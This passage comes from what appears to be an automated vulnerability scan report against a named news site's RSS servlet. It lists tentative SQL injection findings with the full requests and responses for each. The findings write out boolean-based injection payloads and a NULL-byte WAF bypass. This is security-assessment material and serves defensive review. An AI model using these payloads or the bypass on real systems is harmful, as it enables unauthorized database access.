<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.101. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200939.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200939.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13962808%20or%201%3d1--%20 and 13962808%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d1--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d2--%20/200939.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:16 GMT
Content-Length: 0
Connection: close


1.102. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200946.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200946.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11601329'%20or%201%3d1--%20 and 11601329'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d1--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:30 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet11601329'%20or%201%3d2--%20/568/200946.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.103. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200950.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200950.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:49 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200950.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:49 GMT
Content-Length: 0
Connection: close


1.104. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200952.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200952.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 84008678'%20or%201%3d1--%20 and 84008678'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d1--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:46 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet84008678'%20or%201%3d2--%20/568/200952.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.105. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200953.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200953.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:48 GMT
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200953.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.106. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200956.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200956.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200956.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.107. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:22:44 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:44 GMT
Content-Length: 0
Connection: close


1.108. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200957.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200957.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15133132%20or%201%3d1--%20 and 15133132%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d1--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56815133132%20or%201%3d2--%20/200957.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:48 GMT
Content-Length: 0
Connection: close


1.109. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200960.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200960.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 14002997'%20or%201%3d1--%20 and 14002997'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d1--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56814002997'%20or%201%3d2--%20/200960.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:58 GMT
Content-Length: 0
Connection: close


1.110. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/203708.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/203708.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20696714'%20or%201%3d1--%20 and 20696714'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi20696714'%20or%201%3d1--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:18 GMT
Date: Tue, 07 Dec 2010 23:19:18 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi20696714'%20or%201%3d2--%20/rss/CustomRssServlet/568/203708.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
